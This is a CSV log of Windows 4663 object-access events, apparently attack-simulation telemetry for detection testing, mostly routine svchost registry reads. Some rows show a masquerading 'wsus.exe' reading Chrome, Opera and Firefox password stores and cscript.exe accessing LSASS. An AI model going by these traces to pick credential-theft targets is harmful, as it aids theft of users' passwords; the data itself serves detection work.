+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + 
C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + 
+ + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452905 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452904 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452903 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452902 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452901 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452900 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452899 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452898 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452897 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452896 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452895 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452894 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452893 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452892 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452891 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452890 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452889 + + + + + Security + PC01.example.corp + + + + + 
S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452888 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452887 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452886 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 
+ + 452885 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452884 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452883 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452882 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452881 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452880 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452879 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452878 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452877 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452876 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452875 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452874 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452873 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452872 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452871 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452870 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452869 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452868 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452867 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452866 + + + + + Security + PC01.example.corp + + + + + 
